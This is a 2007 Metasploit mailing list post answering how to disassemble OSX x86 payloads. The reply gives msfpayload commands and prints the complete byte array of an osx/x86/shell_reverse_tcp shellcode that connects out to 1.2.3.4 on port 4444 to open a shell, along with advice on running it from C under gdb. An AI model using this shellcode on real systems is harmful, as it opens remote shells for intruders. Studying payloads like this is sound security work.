Metasploit mailing list archives
msfpayload mach-o
From: hdm at metasploit.com (H D Moore)
Date: Fri, 17 Aug 2007 16:56:14 -0500
On Friday 17 August 2007 16:47, Daniel Guido wrote:
Are there any plans to write a Rex::Text.to_osxmacho function? :-)
Not yet, any volunteers? ;-)
If I wanted to disassemble the OSX x86 payloads to see what they're doing, how could I write a small program to compile them and load them into gdb? (assuming that's the best way to go about it). I'm a little stuck.
Try something like: $ msfpayload osx/x86/payload_name OPT=VAL C Take this code, put it into a C file that casts the shellcode array to a function pointer, then calls it (lots of examples in the shellcode section of milw0rm.com). Then compile and breakpoint like any other app. Example: $ msfpayload osx/x86/shell_reverse_tcp LHOST=1.2.3.4 C /* * osx/x86/shell_reverse_tcp - 65 bytes * http://www.metasploit.com * AppendExit=false, PrependSetresuid=false, * PrependSetuid=false, LPORT=4444, PrependSetreuid=false, * LHOST=1.2.3.4 */ unsigned char buf[] = "\x68\x01\x02\x03\x04\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0\x50" "\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62" "\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68" "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53" "\x50\xb0\x3b\xcd\x80"; Example C: http://milw0rm.com/shellcode/536 PPC http://milw0rm.com/shellcode/504 X86 -HD
Current thread:
- msfpayload mach-o Daniel Guido (Aug 17)
- msfpayload mach-o H D Moore (Aug 17)